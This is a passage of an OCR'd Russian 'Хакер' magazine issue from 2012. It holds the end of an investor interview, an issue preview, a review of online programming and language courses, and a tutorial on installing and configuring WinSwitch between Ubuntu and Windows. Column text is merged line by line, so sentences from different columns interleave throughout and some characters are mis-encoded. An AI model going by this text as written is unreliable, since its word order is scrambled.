начинают писать софт: смотрят, что где-то есть Я говорил со многими, и они считают, что у них дженералисты, которые имеют понимание
какие-то проблемы, и что-то там решают. Часто нет времени на все эти отчеты. Но пока эти в технологиях, имеют доступ к экспертизе.
решают они очень нишевые задачи. А вот рас- самые отчеты не сделаешь — следующий этап Как венчурный капиталист, я ведь не эксперт
ширение бизнеса зачастую затруднительно. гранта не получишь. Значит, возникают кассо- во всем. Если мне нужна какая-то специальная
Есть куча людей, которые на таком нишевом вые разрывы. Вот компании и считают, что все экспертиза, я нахожу человека на мировом
софте зарабатывают деньги (Famatech и их это нафиг не нужно, один геморрой. рынке, которому я могу доверять: я знаю, что
RAdmin, скажем, и можно назвать еще много Сейчас я затаскиваю туда исследова- это именно тот человек, который может под-
интересных компаний), но они вырастают до тельский проект под названием OpenFlow, сказать мне, хорошо это или плохо. Но я все же
отвечаю за результат и своей репутацией.
В Сколково нужно создавать атмосферу
простоты, прозрачности, доверия и репута-
ционной ответственности. Когда не просто
ТРИ ПОЖЕЛАНИЯ ПРЕДПРИНИМАТЕЛЯМ существует какая-то компании, а за компанией
строит конкретный антрепренер, чья репута-
ция какими-то вещами либо поднимается, либо
БЫТЬ НЕМНОЖКО УЧИТЬСЯ СТАВИТЬ АМБИЦИ- опускается. Вот в таком случае, думаю, такая
1 CRAZY 2 НА ОШИБКАХ 3 ОЗНЫЕ ЗАДАЧИ атмосфера сложится. Так живет Кремниевая
Стремиться оставаться И делать их как можно И так их отмерять, чтобы долина. Чтобы создать это, нам нужно, чтобы
немножко ненормальным, больше. Но никогда даже если ты достигнешь было кипение, круговорот открытости и всего
даже если это непонятно не повторять! 20-30% от задуманного, остального. Я хочу верить, что получится.
окружающим. то мог бы собой гордиться. Иначе будет трудно запустить инновационную
индустрию в России. z

028 ХАКЕР 04 /159/ 2012

Preview 30 страниц на одной полосе.
Тизер некоторых статей.

PCZONE

УНИВЕР ОНЛАЙН
30 Освоить новый для себя язык програм-
мирования сегодня просто как никогда.
Чтобы получить минимальный базис,
с помощью которого можно начать
разработку простейших приложений,
теперь необязательно даже читать
умные книжки. Для многих технологий
появились очень доступные и понятные
обучалки, которые в интерактивном
режиме позволяют пощупать новую для
себя технологию без лишней прилюдии
и занудства. А для фундаментальных
предметов ведущие ВУЗы мира разра-
батывают онлайн-курсы, позволяющие
прослушать лекции, ранее доступные
только студентам за бешенные деньги.

PC ZONE ВЗЛОМ

РАСШАРИТЬ ПРИЛОЖЕНИЕ! «GOOGLE СЛЕДИТ ЗА ТОБОЙ, МЫ — НЕТ» ТЕМНАЯ СТОРОНА ТРАССИРОВКИ

36 Можно ли перенести окно приложения из 40 Google уже давно мейнстрим. Гики 56 Механизмы отладки и трассировки ASP.
WIndows-системы в Linux и продолжить предпочитают другой поисковик — NET приложений, которыми пользуются
с ним работу? Можно, если установить на DuckDuckGo, который заботится об web-разрабочики, могут стать причиной
обоих компьютерах утилиту WinSwitch. анонимности пользователей. взлома. Разбираемся на примере.

ВЗЛОМ MALWARE

ВЗЛОМ MAIL.RU АГЕНТА С АНТИВИРУСОМ ПОКОНЧЕНО НЕИЗВЕСТНАЯ УГРОЗА

60 Эта статья не о взломе замечательного 74 Последняя статья из серии о внутреннем 80 Испытываем эвристику аверов на
мессенджера. Это история о том, как с устройстве анивирусов. В этот раз мы самых новых вирусах, которые еще не
нуля был отреверсен формат, в котором рассмотрим мониторинг сетевой актив- появились в базах популярных анти-
хранятся сообщения пользователя. ности и песочницы. вирусных решений.

ХАКЕР 04 /159/ 2012 029

PC ZONE Капитан Улитка

УНИВЕР ОНЛАЙН
МОЖНО ЛИ СТАТЬ СПЕЦИАЛИСТОМ В IT,
НЕ ВЫХОДЯ ИЗ ДОМА? ДА!
На одних только статьях журнала «Хакер» далеко ель данного материала — показать,

не уедешь. Это я тебе точно говорю. Если хочешь стать Ц насколько просто сегодня можно
обучаться самостоятельно. Бы-
настоящим специалистом в области IT, необходимо учиться стро осваивать новые технологии и языки
программирования. При этом делать это не
и обязательно получить фундаментальные знания о предмете. в напряг и получать настоящее удовольствие
К счастью, сегодня для этого возможностей больше, чем от обучения. Я не претендую на полноту кар-
тины, и эта статья, само собой, не является
когда-либо. В Сети не только доступно множество учебников сборником всех проектов, которые могут по-
бесплатно, но и стремительно развиваются совершенно мочь тебе в самообразовании. Но я постарал-
ся собрать некоторые особенно интересные
новые, прогрессивные способы обучения. И особенно это сервисы, которые были интересны лично мне.
касается нашей – IT’шной — специальности. Уверен, они пригодятся и тебе.

030 ХАКЕР 04 /159/ 2012

 Универ онлайн

Изучаем английский язык

Я серьезно рискую, начиная этот материал со интересные возможности. Большинство авто- Короче говоря, изучение языка нужно добавить
слов «английский язык». У многих людей с ним ритетных конференций проходит на английском. в свой личный список дел в качестве одного
сложности, и ирония в том, что чем серьезнее В самых крупных сообществах специалистов из приоритетных пунктов. Сказать по правде,
проблема, тем больше люди противятся его принят английский язык. Известные ученые ве- абсолютное большинство ресурсов, о которых я
изучению, придумывая отговорки и оправдания. дут блоги и пишут статьи на английском языке. буду говорить далее, требуют хотя бы минималь-
Как бы там ни было, могу тебе сказать с пол- На английском языке говорят в Силиконовой до- ного знания английского. Однако для первого
ной уверенностью: по-настоящему успешный лине. И на нем же изъясняются программисты из проекта из нашего обзора иностранный как раз
IT-специалист если и может обойтись без Индии, которых стало так много, что спрятаться не нужен — напротив, он направлен на то, чтобы
английского языка, то упускает при этом многие от них у тебя не получится при всем желании :). ты быстро прокачал свои знания «ИнЯз’а».

LINGUALEO ческих минивыступлений с TED.com), лекций

из западных университетов (в том числе по
Есть простое правило: чтобы лучше и уверен- иностранному языку) и так далее. Все это
нее подтягиваться на турнике, нужно больше разбито на категории по тематике, сложности
и чаще подтягиваться на турнике. Просто ин- и рейтингу у пользователей. Но главное за-
тенсивнее заниматься. Так же и с английским: ключается в том, как именно сервис позволяет
чтобы хорошо понимать на слух английскую этот контент потреблять. Рядом с видео выво-
речь, не вслушиваясь в каждое слово в по- дится полная расшифровка речи, поэтому ты
пытке разобрать хоть что-то, нужно больше всегда можешь прочитать непонятный на слух
слушать этой самой речи. Можно начать с про- фрагмент. Встречаешь неизвестное слово?
смотра какого-нибудь сериала, подключив Один клик, — и LinguaLeo тут же показывает себя контент и быстро разбираешься с непо-
для уверенности оригинальные субтитры, но... перевод и заносит это слово в твой личный нятными местами. Для себя я не вижу лучшего
по сравнению с тем, что представляет сервис словарь, чтобы дальше с помощью самых раз- способа, во-первых, пополнять словарный
LinguaLeo.ru, — это прошлый век. В его базе ных упражнений ты мог запомнить его и начать запас, а во-вторых, привыкнуть к английской
уже собрано огромное количество сериалов, использовать в нужном контексте. Никаких речи. Чтобы «отрабатывать» те слова, которые
всевозможных фильмов, записей различных тебе больше ковыряний с субтитрами и сло- просто встречаются в интернете, я давно себе
семинаров и выступлений (например, темати- варей, – ты просто смотришь интересный для установил специальный аддон для браузера.

Онлайн-универы
Найдется немало людей, которые захотят по- что всему можно научиться самостоятельно, (например, в iTunes), но и вообще формиро-
спорить о том, необходимо ли ИТ-специалисту — было бы желание. Последнее стало еще вать культуру преподавания университетских
высшее образование. Правы те, кто говорит, что проще после того как ведущие западные вузы предметов онлайн. Хотел бы я сейчас отметить
фундаментальные знания остро необходимы. с зашкаливающей стоимостью обучения начали подобные инициативы со стороны российских
Но можно согласиться и с теми, кто утверждает, не только выкладывать видео своих лекций вузов, но здесь сказать пока нечего.

УЧЕБНЫЕ КУРСЫ ОТ СТЭНФОРДА ственный интеллект» (ai-class.com), «Введение • Криптография (cs101-class.org);

в базы данных» (db-class.org). Каждый из курсов Помимо непосредственно ИТ’шных предметов,
Университет Стэнфорда, расположенный в Кали- состоит из лекций, проверочных работ и финаль- есть пара курсов по предпринимательству
форнии, известен по всему миру. Фактически это ного экзамена. В случае успешного завершения (в области высоких технологий). Я пока успел по-
кузница кадров для технологических компаний обучения студент получает сертификат в виде слушать курс по машинному обучению и получил
Силиконовой долины, многие из которых рас- PDF-файла, заверенного цифровой подписью огромное удовольствие. Курс построен таким
положены в Пало Альто — в том же городе, что преподавателя. Эксперимент оказался успеш- образом, чтобы быть понятным практически
и сам университет. Попасть в Стэнфорд — мечта ным, и в начале года Стэнфорд анонсировал каждому, хотя, безусловно, знания в области
для многих молодых людей, которые жаждут сразу дюжину новых курсов, в том числе: дискретной математики и математического ана-
сделать карьеру в области ИТ. Чем больше • Информационная безопасность (security- лиза будут здесь очень полезны. Надо сказать,
читаешь про Стэнфорд, тем больше радуешься class.org); что видео любого из курсов сопровождается
тому факту, что осенью университет запустил • Проектирование и анализ алгоритмов субтитрами на случай, если что-то сложно разо-
проект бесплатных онлайн-курсов. Изначально (security-class.org); брать на слух. Как правило, язык очень простой,
всем желающим предлагалось пройти три курса: • Теория игр (cs101-class.org); поэтому все понятно даже со средним уровнем
«Машинное обучение» (ml-class.org), «Искус- • Информатика (cs101-class.org); английского.

MITX ОТ МАССАЧУСЕТСКОГО лась информация о первом курсе, который будет давателей — профессор Джеральд Сассмен,
ТЕХНОЛОГИЧЕСКОГО ИНСТИТУТА проходить с помощью этой системы – «6.002x: который создал язык Scheme и является автором
Схемотехника и электроника». Обучение начнется одного из самых лучших учебников по програм-
Ты наверняка слышал и о MIT — не менее из- весной и потребует примерно десять часов в не- мированию — «Structure and Interpretation of
вестном западном вузе. Тот тоже пошел по стопам делю. Предмет непростой, поэтому допускаются Computer Programs». В скором будущем обеща-
Стэнфорда и в начале года анонсировал раз- только студенты, обладающие необходимыми ется появление и других предметов. Уверен, что
работку MITx — технологической платформы для знаниями по электричеству, магнетизму и диффе- подобное по зубам и российским учебным заведе-
онлайн-образования. И вот уже в феврале появи- ренциальному исчислению. Среди трех препо- ниям, которые просто обязаны не отставать.

ХАКЕР 04 /159/ 2012 031

PC ZONE

JavaScript

Главное, о чем я хочу сегодня рассказать — сколько особенно модных языков програм- взаимодействие с пользователем. Особен-
это сервисы, позволяющие изучить вполне мирования: Python, Ruby (плюс Ruby on Rails) ные гики умудряются имплементировать на
конкретный язык программирования. Тут и, конечно же, JavaScript (HTML5). С послед- JavaScript совершенно невозможные вещи:
очень заметна закономерность: чем актив- него и начнем. взять хотя бы проект виртуальной машины,
нее язык развивается и набирает популяр- Ни одно современное веб-приложение не на которой вполне себе успешно запускается
ность, тем больше появляется инструментов обходится сегодня без ударной дозы кода Linux (bellard.org/jslinux). Но этот случай мы
для его изучения. Для примера я взял не- на JS, на котором полностью реализовано рассматривать не будем :).

CODECADEMY Секрет успеха в изящности процесса обу-

чения. С помощью специального интерфейса
www.codecademy.com студентам сразу же начинают рассказывать
о базовых особенностях языка и его синтак-
Простой вопрос: какой самый проверенный сиса, и, что важнее всего, предлагают сразу
способ выучить новый язык программирова- проверить знания в действии, набрав код
ния? Взять умную книгу и начать ее читать. в специальной консоли. Все это происходит
Этот подход никогда не устареет. Так было в браузере, без необходимости устанавливать
двадцать лет назад, так есть и сейчас. Однако что-либо на своем компьютере. Шаг за шагом
сложно представить, что к 21 веку не приду- можно быстро разобраться, что к чему, и по-
мали более прогрессивных методов обучения, нять все базовые принципы JavaScript. Чтобы
тем более — обучения программированию. еще больше стимулировать студентов к обуче-
Codecademy — это стартап, позиционирующий нию, по мере прохождения курса им выдаются
себя как школу разработчика. За семьдесят награды.
два часа после открытия он собрал более Проект быстро получил финансирование платформе Codecademy. Проект выбрал
двухсот тысяч (вдумайся в цифру!) начинаю- и очень скоро обещает значительное попол- модель UGC (User-generated content) и сейчас
щих программистов, предложив им пройти нение учебных курсов. Уже сейчас доступна активно привлекает к пополнению контента
интерактивный курс JavaScript. система для создания своих курсов на готовой сообщество.

ВЫУЧИТЬ JQUERY портал Nettuts+, известный своими каче-

ЗА ТРИДЦАТЬ ДНЕЙ ственными обучающими статьями, разработал
специальный курс. Курс разбит на тридцать
learnjquery.tutsplus.com уроков-скринкастов по пятнадцать минут
каждый, что позволяет день за днем посте-
Неотделимой частью JavaScript постепенно пенно брать библиотеку на вооружение. Как
стала библиотека jQuery, упрощающая работу ни крути, а пятнадцать минут можно найти
с HTML-документом, обработку событий, всегда. Да и формат обучения очень приятный:
создание анимации и реализацию AJAX. лично для меня нет ничего более понятного,
Фактически jQuery во многом изменил подход чем непосредственная демонстрация кодинга
к программированию на JavaScript. Разобрать- с комментариями по ходу дела. Для тех, кто
ся с библиотекой в принципе несложно. Но только начинает изучать JS, есть и видеокурс
чтобы сделать это еще более безболезненно, этого же автора (bit.ly/AqK4s0).

ПЕРВЫЙ ПОЛЕТ НА JQUERY рых включает в себя обучающий скринкаст

и интерактивные упражнения по программи-
codeschool.com/courses/jquery-air-first-fligh рованию, реализованные прямо в браузере. За
прохождение заданий начисляются очки (на-
Если спросить, кто снимает скринкасты пример, 350 за решенную задачку). Если где-то
эталонного качества, то среди победите- возникла трудность, можно попросить под-
лей совершенно точно будет онлайн-школа сказку, но в этом случае не избежать штраф-
программирования c<>de school. Это очень ных баллов. На первом уровне предлагается
профессиональный проект, предлагающий пройти азы JavaScript, на втором — селекторы,
как платные, так и бесплатные курсы для на третьем — CSS-атрибуты, на четвертом —
специалистов различного уровня. Курс «jQuery манипулирование с HTML-элементами и DOM,
Air: First Flight» долгое время был платным, но на пятом — работа с событиями. Чтобы пройти
с недавнего времени открыт всем желающим. курс, необходимо выполнить пятьдесят пять
Он состоит из пяти уровней, каждый из кото- простых и не очень упражнений.

032 ХАКЕР 04 /159/ 2012

 Универ онлайн

Ruby и Ruby on Rails

Если ты читал в прошлом номере интервью все. И чем больше растет спрос, тем больше Впрочем, знание языка пригодится, даже если
с Аленой Владимирской, которая по праву счи- становятся зарплаты. Если у тебя есть опыт ты не собираешься работать профессиональ-
тается ведущим хедхантером Рунета, то уже программирования, и ты хочешь переква- ным разработчиком. Ruby популярен и среди
знаешь, насколько востребованными сейчас лифицироваться на более востребованное экспертов по информационной безопасности:
являются программисты на Ruby on Rails. За направление, то Ruby в связке с Ruby on Rails к примеру, известный фреймворк для хакера
грамотными специалистами, готовыми быстро — совершенно точно очень неплохой вариант. Metasploit (и в том числе все его модули) на-
поднимать растущие веб-проекты, гоняются И выучить его сейчас можно довольно быстро. писаны именно на Ruby.

RUBYMONK предлагаются более сложные упражнения.

Совершенно улетно реализована проверка
rubymonk.com выполненных заданий (код решения, есте-
ственно, надо набирать прямо в браузере,
Проект представляет собой интерактивную а редактор даже поддерживает подсветку
книгу, состоящую из пятидесяти упражнений, синтаксиса). Для каждого упражнения заданы
позволяющих быстро пройтись по основам контрольные точки, по которым проверяет-
Ruby. Тебе говорят: «Массив из элементов ся правильность решения. Таким образом,
создается так – попробуй». И ты пробуешь. в любой момент можно понять, что именно не
Далее объясняется что-то еще, — ты опять нравится интерактивной системе, какой ре-
же сразу проверяешь это в действии. Как зультат должен быть на выходе, и где в твоем
только знаний становится достаточно, тебе решении спряталась ошибка.

TRY RUBY вообще никогда не имел дело с программиро-

ванием, try ruby будет тебе по зубам. Правда,
tryruby.org в этом случае обучение, вероятно, займет чуть
больше времени. Всего нужно пройти восемь
Если у тебя был мало-мальский опыт програм- уроков и справиться с более чем пятьюдесятью
мирования, то эта интерактивная обучалка заданиями. Проект стал еще лучше после того,
буквально за пятнадцать минут позволит тебе как его взяла под свое крыло уже упомянутая
пройтись по базовым понятиям языка Ruby выше школа c<>de school. Теперь это практи-
и понять, что к чему. Впрочем, даже если ты чески идеальный репетитор.

THE INTRO TO RAILS SCREENCAST I убойный скринкаст с говорящим названием

WISH I HAD «Скринкаст для чайников в Rails, с которо-
го я хотел бы начать сам». В 40-минутном
bit.ly/zqLVPH ролике в самой доходчивой форме рассказы-
вается, как использовать Rails. После этого
Как уже было отмечено, язык Ruby четко ас- слова «Models», «TDD», «ActiveRecord»,
социируется с популярнейшим фреймворком «RSpec», «Capybara», «Partials» уже не будут
для построения веб-приложений Ruby On пугать. Это не единственный скринкаст для
Rails. Последний помог взлететь не одному начинающих: немало видеоуроков для про-
стартапу из Силиконовой долины, в том граммистов самого разного уровня можно
числе и Twitter’у. Джеффри Вэй — главный найти на другом профильном проекте —
редактор сервиса tutsplus.com — записал railscasts.com.

RAILS FOR ZOMBIES Записанные на неизменно высоком уров-

не уроки, приправленные здоровой дозой
railsforzombies.org юмора, сопровождаются упражнениями,
составленными из ситуаций, с которыми
После того (и только после того!) как у тебя каждый день встречаются программисты на
будут необходимые знания Rails и некоторый «рельсах». Если этого курса тебе окажется
опыт в создании веб-приложений, обязатель- мало, то у авторов есть продолжение «Rails
но нужно пройти бесплатный курс «Рельсы for Zombies 2», но его можно пройти уже
для зомби» от все той же школы c<>de school. только за денежку.

ХАКЕР 04 /159/ 2012 033

PC ZONE

Python

Python — один из популярнейших языков максимально быстрого прототипирования бывала ситуация, когда нужно было что-то
программирования среди специалистов по сложных информационных систем. Впрочем, оптимизировать, и каждый раз знания языка
информационной безопасности. Огромное ко- прототипом дело часто не ограничивается: оказывались очень полезны.
личество подключаемых библиотек позволяет найдется немало проектов, код которых на- Более того, Python часто встраивают во многие
быстро писать сложные сценарии и вспомога- писан на Python, и которые выдерживают серьезные приложения в качестве скриптово-
тельные приложения. Многие профи вообще огромные нагрузки. Изучить этот язык можно го языка, чтобы иметь богатые возможности
считают Python идеальным инструментом для даже просто для себя: у меня десятки раз для создания сценариев.

ПОПРОБУЙ PYTHON! надо даже устанавливать интерпретатор. Это

очень удобно: любой приведенный пример
trypython.org можно тут же попробовать в действии. Однако
на этом интерактивность заканчивается: Try
Лучший способ быстрого старта — попро- Python никак не проверяет твой код, не следит
бовать онлайн-обучалку Python. По инте- за правильностью действий и не предлагает
рактивности сервис сильно проигрывает задачки для проверки знаний. Весь курс со-
аналогичным проектам для JS и Ruby, но, тем стоит из семи частей (пять по Python и две по
не менее, позволяет пройти базовый курс IronPython). Забавно, что сам сервис написан
обучения прямо в браузере. На компьютер не на Silverlight’е.

ОНЛАЙН-РЕПЕТИТОР PYTHON тривать значения разных структур данных

(переменных, объектов в куче, фреймов
onlinepythontutor.com стэка). Это может быть произвольный код,
набранный прямо в браузере, или один из не-
Забавный сервис был разработан в рамках скольких заранее заготовленных сниппетов,
курса по программированию в известной взятых из учебной программы Python в MIT.
американской кузнице программистов Мас- Забавно, что здесь есть несколько задачек,
сачусетского технологического института. которые предлагают соискателям на долж-
Его идея заключается в том, чтобы визуали- ность программистов. С решениями. Сервис
зировать выполнения сценариев, написанных можно было бы назвать онлайн-отладчиком, возможности подключения модулей, выпол-
на Python, позволяя пошагово выполнять их однако для выполнения сложных сценариев нения I/O-операций и так далее. Кстати, код
(вперед-назад) и на каждом шаге просма- использовать его уже нельзя из-за отсутствия проекта полностью открыт.

УРОКИ PYTHON ОТ GOOGLE должности разработчиков). Теперь этот курс

полностью открыт и бесплатен. Он включает
code.google.com/edu/languages/google- в себя пошаговые мануалы, видео лекций,
python-class/index.html а также много упражнений для тренировки
и закрепления материалов. Первые занятия
Google давно славится тем, что активно ис- касаются базовых понятий в Python (вроде
пользует у себя Python. В компании есть даже строк и списков), далее — последовательно
специальный курс, предназначенный для освещается разработка полноценных при-
людей, у которых пока мало опыта в програм- ложений, работающих с файлами, процессами в Google этот курс проходит по интенсивному
мировании (естественно, они не работают на и HTTP-соединениями. Надо сказать, что сценарию и умещается в два дня.

ПОПРОБОВАТЬ ТЕХНОЛОГИЮ!

Интерактивные обучалки, позволяющие к примеру, познакомиться с набирающими • Erlang: tryerlang.org;

быстро прочувствовать новую технологию, оборот функциональными языками • Clojure: try-clojure.org;
появляются, как грибы после дождя. Ниже я программирования или новомодными NoSQL • MongoDb: try.mongodb.org;
привожу еще несколько подобных проектов, базами данных. • RedisDb: try.redis-db.com;
которые не вошли в сегодняшний обзор, • Haskell: tryhaskell.org; • C#: bit.ly/A4HR9m;
но будут очень полезны, если ты хочешь, • Scala: simplyscala.com; • Язык запросов SQL: sql-ex.ru.

034 ХАКЕР 04 /159/ 2012

Ðå ê ë à ì à
PC ZONE Антон «Ant» Жуков ([email protected])

УЧИМСЯ ПЕРЕНОСИТЬ
ЗАПУЩЕННЫЕ
ПРОГРАММЫ С ОДНОГО
КОМПЬЮТЕРА НА ДРУГОЙ

РАСШАРИТЬ
ПРИЛОЖЕНИЕ!
Расшарить между компьютерами какой-либо документ — просто.
Предоставить удаленный доступ к рабочему столу — нет проблем.
Но почему-то до сих пор нельзя просто «поделиться» запущенным
приложением — взять и быстро перенести его окно из одной
системы в другую. С появлением проекта WinSwitch это стало
возможным.

ЧТО ТАКОЕ WINSWITCH? случае, когда для нужной системы нет подходящей версии. Или
Если ты часто имеешь дело с виртуальными машинами, то на- вот еще пример: у меня дома рядом стоят компьютер на Windows
верняка знаешь о такой замечательной возможности как перенос и ноутбук на Ubuntu, — теперь я без проблем могу перекидывать
окон из гостевой операционной системы, запущенной в виртуаль- приложения с одной системы на другую (ну и с одного экрана на
ном окружении, в хостовую ОС (основную систему на компьюте- другой). Хоть даже Visual Studio. В результате можно расшарить не
ре). То есть если на виртуальной машине крутится винда, а сама документ, а приложение.
виртуальная машина работает на Ubuntu, то любые запущенные
приложения можно «перенести» из Windows в Ubuntu. Что самое УСТАНОВКА
прикольное, — они будут работать так, как если бы были запущены Теперь, когда понятно, о чем идет речь, попробуем WinSwitch в дей-
самым обычным способом. У меня давно возникла идея реали- ствии. Для примера организуем связь между двумя машинами, вы-
зовать что-то подобное, но не в плоскости виртуальной машины, брав в качестве плацдарма две разных ОС — Ubuntu Natty Narwhal
а с точки зрения протоколов для доступа к удаленному рабочему (11.04) и Windows XP.
столу. RDP или VNC без проблем позволяют получить картинку Windows. Тут все довольно примитивно: на официальном сайте
с компьютера, который может находиться за тысячи километров, winswitch.org скачиваем инсталлятор, который все сделает за нас.
и вполне комфортно с ним взаимодействовать. Но зачем нужна Для корректной работы программе понадобится mDNS-сервер
картинка полного рабочего стола, когда работать приходится (подробней об mDNS смотри во врезке) — если на машине он не
с одним или двумя конкретными приложениями? Ведь можно же установлен (а он, скорее всего, не установлен), то инсталлятор
отображать только их окна? Удивительно, но реализации такой выдаст соответствующее сообщение и предоставит ссылку на дис-
простой идеи долго не было. Пока не появился WinSwitch! трибутив.
Как это выглядит? Запустив какое-либо приложение через спе- Linux. Я, как уже было отмечено выше, буду использовать
циальный сервер, ты сможешь напрямую перенести его на любое Ubuntu, но, само собой, подойдет и любой другой дистрибутив
устройство, где будет установлен соответствующий клиент. Тут тукса. В убунте приложение можно установить через менеджер па-
нужно понимать — не файлы приложения, а именно окно програм- кетов, предварительно прописав цифровую подпись репозитория
мы, с которым можно работать. Теперь, если нужно продолжить с нужными нам пакетами:
работу над текущим документом в Microsoft Word или, скажем,
над проектом в Visual Studio на другом компьютере, можно просто sudo su -
«перетащить» туда окно. А поскольку проект кроссплатформен- wget -O — https://winswitch.org/gpg.asc | apt-key add -
ный, то это еще и отличный способ работать с приложением в том

036 ХАКЕР 04 /159/ 2012

 Расшарить приложение!

Запуск приложения на локальном WinSwtich сервере через контекстное меню Успешное соединение с удаленным сервером ant-vb

echo "deb http://winswitch.org/ natty main" > /etc/apt/ шифрования трафика. Нас же, преж де всего, будет интересо-
sources.list.d/winswitch.list вать параметр listen_on, определяющий, на каком интерфейсе
apt-get update и порт у сервер будет ожидать подключений. Его, в принципе,
apt-get install winswitch тоже можно оставить в состоянии «по умолчанию», но я для
порядка все же поставил listen_on="*:32123" (это означает,
Проект находится в стадии активной разработки и пока пред- что сервер будет ожидать подключения на 32123 порт у на
ставляет собой решение скорее для гиков, чем для обычных всех сетевых интерфейсах). Далее идет еще один интересный
людей, поэтому чтобы заставить его работать придется немного параметр allow_root_logins, который в целях безопасности
повозиться с настройкой. рекомендуется установить в значение False. Он определяет,
можно ли будет подключиться к данному серверу под адми-
НАСТРОЙКА нистратором/ру том. Параметр allow_root_authentication дает
WinSwitch состоит из двух частей: сервера и клиента (так назы- возможность соединиться с сервером под любым пользова-
ваемого апплета). Клиент необходим в системе, чтобы в нее можно телем, не зная его пароля. Его я тоже отключил из соображе-
было «перетащить» приложения — его можно запустить сразу ний безопасности. Следующая интересная секция — mDNS
после установки через меню. Также при старте апплета автомати- settings — позволяет включать/отключать сервис mDNS,
чески запускается локальный сервер, чтобы иметь возможность
расшарить приложения с локальной машины. При запуске клиент
пытается определить все доступные сервера в сети при помощи
mDNS.
Конфигурирование как клиента, так и сервера осуществляется
через конфигурационные файлы. При первом запуске программа
создает необходимые папки и генерирует конфиги, что может занять
некоторое время. Как только программа запустилась, идем искать
конфиги сервера. В *nix они будут в папке ~/.winswitch/server/server.
conf, а в Windows — *\Application Data\Window-Switch\server\server.
conf. Рассмотрим наиболее важные для нас параметры. Каждый сер-
вер имеет свой идентификатор, имя и тип, — все это автоматически
генерируется при запуске и выглядит примерно так:

# Identity
ID="8796747538515"
name="testpc"
type="workstation"

Ту т можно все оставлять без изменений. Далее в конфи-

ге иду т публичный и приватный ключи, используемые для Запуск приложения на локальном WinSwitch сервере

ХАКЕР 04 /159/ 2012 037

PC ZONE

Подключение у удаленному рабочему столу Ubuntu через VNC Сапер, "отправленный" из другой операционной
системы

используемый для того, чтобы клиенты при запуске могли появилось такое же окно, сообщающее, что найден сервер ant-vb
самостоятельно находить в сети дост упные сервера. Если и просьбой ввести пароль пользователя ant для соединения.
установить параметр mDNS_publish в значение False, то Связь установлена — попробуем отправить приложение с одной
автоматический поиск серверов будет отключен и их придется системы на другую. Идем в линукс, жмем на значок WinSwitch
добавлять вручную. Чтобы клиенты обнаруживали не только в трее и выбираем «Start Application Æ Games Æ Mines». Появ-
сервера, но и имя пользователя, под которым можно зайти, ляется аналог виндового сапера (можно чуть поломать голо-
есть опция mDNS_publish_username. Еще одна полезная воз- ву), – теперь мы готовы его расшарить. Опять жмем на иконку
можность — запуск сервера в режиме отладки — может силь- приложения в трее, выбираем «Mines Æ Send to user on testpc».
но помочь, когда надо прояснить, почему что-то не работает. И приложение исчезает. Переходим в винду и видим, что оно
Остальные опции в случае необходимости ты можешь изучить появилось там. Вуаля!
сам, так как они достаточно хорошо прокомментированы Надо сказать, что WinSwitch уже содержит список предопреде-
в самом файле. ленных приложений, рассортированных по категориям, которые
можно расшарить. Но можно запустить и свое приложение, если
ТЕСТ-ДРАЙВ выбрать «Start Application Æ Custom Command». Для удобства
Наша задача — запустить какую-нибудь программу и «отпра- эта фича также интегрируется в контекстное меню, так что будет
вить» ее с одного компьютера на другой. В идеальном случае все достаточно выбрать нужную программу, щелкнуть по ней правой
заработает без лишних заморочек. Сначала поработаем на ма- клавишей и выбрать «Open in Window Switch». Кроме приложений,
шине с Windows XP. Открываем меню «Пуск» и запускаем клиент можно получить доступ к самому рабочему столу («Main Unix Display
Window-Switch. Как уже обсуждалось выше, при запуске апплета Æ VNC Copy»). Помимо непосредственно окна можно форвардить
автоматически запустился и сервер. Апплет его тут же обнару- также и звук (для этого используется библиотека GStreamer).
жил и подключился к нему. Теперь идем в Ubuntu. Открываем
стартовое меню и выбираем «Internet Æ WindowSwitch». Апплет ОТЛАДКА
стартует, запускается сервер. Появляется окно, в котором сооб- Я не зря сделал выше ремарку «в идеальном случае», — с первого
щается, что найден сервер с именем testpc и ID=8796747538515. раза у меня система не запустилась. Нажав на значок апплета в трее,
Подтверждаем, что мы хотим с ним соединиться, после чего я понял, что он видит только локальный сервер. Можно, конечно, до-
нас попросят ввести пароль для пользователя user. В винде бавить сервер вручную, но тогда весь смысл автоматизации теряется.

ЧТО ТАКОЕ MDNS?

Multicast DNS (mDNS) является способом «представляя» себя другим участникам сети.
использования привычных программных Таким образом все машины в сети обновляют
интерфейсов DNS в небольших сетях, где свой mDNS-кэш и получают информацию и о
нет необходимости в обычном DNS-сервере. новых хостах/сервисах. Чтобы аннулировать
Проще говоря, использование mDNS свое «представление» (например, в случае
позволяет клиенту определить IP-адрес выключения машины) хост должен отправить
хоста без помощи централизованного DNS- response-пакет с TTL = 0. По умолчанию mDNS
сервера. Машина, ищущая конкретный использует зарезервированную зону «.local».
хост, посылает широковещательный mDNS- Протокол mDNS используют такие системы
запрос. Соответствующий хост отвечает на обнаружения сервисов как Bonjour (Apple)
этот запрос широковещательным ответом, и Avahi (Linux). Ручное добавление сервера для подключения

038 ХАКЕР 04 /159/ 2012

 Расшарить приложение!

Ручной запуск Avahi-демона На данной вкладке можно настроить Главное окно настроек программы
используемые протоколы

Сообщение, свидетельствующее об успешном соединении с удаленной Windows-машиной Полный доступ к удаленному рабочему столу Windows-машины из-под Ubuntu

Поэтому вернусь к этому моменту и расскажу, в чем было дело. Немного поясню. Avahi — это система, производящая ана-
Прежде всего надо бы посмотреть логи. Начал я с винды. Лог лиз локальной сети на предмет выявления различных сервисов.
клиента располагался здесь: *\Application Data\Window-Switch\ К примеру, можно подключить ноутбук к локальной сети и сразу
client\applet.log. Ситуации он не прояснил, так как в нем я не увидел получить информацию об имеющихся принтерах, разделяемых ре-
информации о какой-либо ошибке. Ну что ж, тогда проверим сервер. сурсах, сервисах обмена сообщениями и прочих услугах. Подобная
К сожалению, логов сервера я не нашел. Пообщавшись с документа- технология существует в Mac OS X (Rendezvous, Bonjour) и отлично
цией на официальном сайте, было решено следующее: чтобы посмо- себя зарекомендовала. Avahi во многом базируется на реализа-
треть отладочные сообщения сервера, надо запустить его в консоли ции протокола mDNS — flexmdns. Так как в конфиге сервера у нас
с параметром --debug-mode. Запускаем консоль, переходим в папку включена возможность обнаружения через mDNS, а сам mDNS-
программы (C:\Program Files\WinSwitch) и запускаем сервер: сервер у нас не запущен или не установлен, то автоматическое
обнаружение и не срабатывает. Смотрим список процессов – дей-
Switch-Server.exe --debug-mode ствительно, Avahi нет. Но в списке установленных приложений он
фигурирует, — значит, придется просто запустить его вручную:
Покопавшись в сообщениях сервера, ничего криминального avahi-daemon
